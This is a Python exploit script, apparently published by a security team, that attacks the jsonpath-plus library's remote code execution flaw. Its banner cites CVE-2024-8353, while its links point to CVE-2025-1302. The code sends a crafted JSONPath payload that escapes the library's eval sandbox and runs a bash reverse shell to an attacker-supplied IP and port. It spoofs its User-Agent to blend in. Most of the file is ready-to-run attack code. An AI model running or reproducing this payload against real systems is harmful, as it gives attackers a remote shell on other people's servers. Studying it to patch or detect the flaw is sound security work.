import requests from faker import Faker from urllib.parse import urlparse import time import sys import rich_click as click requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) banner = r""" ..-+*******- .=#+-------=@. .:==:. .**-------=*+: .-=++.-+=:. +*-------=#=+++++++++=:.. -+:==**=+-+:. .%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=.. :%--**+-::::::::::::::::::::+*=: .::*=**=:. ..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:. ..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-. .-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:.. ..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=. .=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%- .*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%- .+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%- .+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%- .=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#- .=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#- .-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*: :+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*. .-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+. .::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-. %+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%. *+.......+*::::::::::::::::-****-:::::=*=:.++:*= .%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#. ++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=. :#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-.. .++....-#:::%. .-*+-..*=.+@= .=+..-# .:+++#@#-:-#= ... .-++:-%@@= .:# :+++**##@#+=. -%@@@%- .-=*#. .=+::+::-@: #@@@@+. :+*=::=*- .=+:-**+%%+=-:.. =*#*-..=*-:::::=* :++---::--=*#+*+++++**+*+**-::::::+= .+*=:::---+*:::::++++++*+=:::::-*=. .:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team) ..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2025-1302 Analysis base : https://github.com/EQSTLab/CVE-2025-1302 ============================================================================================================= CVE-2024-8353 : JSONPath-plus Remote Code Execution description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884). ============================================================================================================= """ class JSONPath_plus_Exploit: def __init__(self, url: str, ip: str, port: int): self.url = url self.ip = ip self.port = port self.formId = None def greeting() -> None: print(banner) def spinner(duration=10, interval=0.1) -> None: spinner_chars = ['|', '/', '-', '\\'] end_time = time.time() + duration while time.time() < end_time: for char in spinner_chars: sys.stdout.write(f'\r[{char}] Exploit loading, please wait...') sys.stdout.flush() time.sleep(interval) print("") def sendRequest(self) -> None: # Fake User_Agent fake = Faker() url = f"{self.url}" pylode = f"$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('bash -c \\\"bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1\\\"').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]" headers = { 'User-Agent': fake.user_agent(), 'Content-Type': 'application/json', 'Accept': '*/*' } try: response = requests.post(url, json={'path' : pylode}, headers=headers, timeout=10) print(f"[+] Exploit Completion!!") except requests.exceptions.Timeout: print(f"[+] Exploit Completion!!") def exploit(self) -> None: self.sendRequest() # argument parsing with rich_click @click.command() @click.option( "-u", "--url", required=True, help="Specify a URL or domain for vulnerability detection (Donation-Form Page)", ) @click.option( "-i", "--ip", required=True, help="LHOST for reverse shell connection", ) @click.option( "-p", "--port", required=True, type=int, help="LPORT for reverse shell connection" ) def main(url: str, ip: str, port: int) -> None: cve_exploit = JSONPath_plus_Exploit(url, ip, port) JSONPath_plus_Exploit.greeting() JSONPath_plus_Exploit.spinner(duration=1) cve_exploit.exploit() if __name__ == "__main__": main()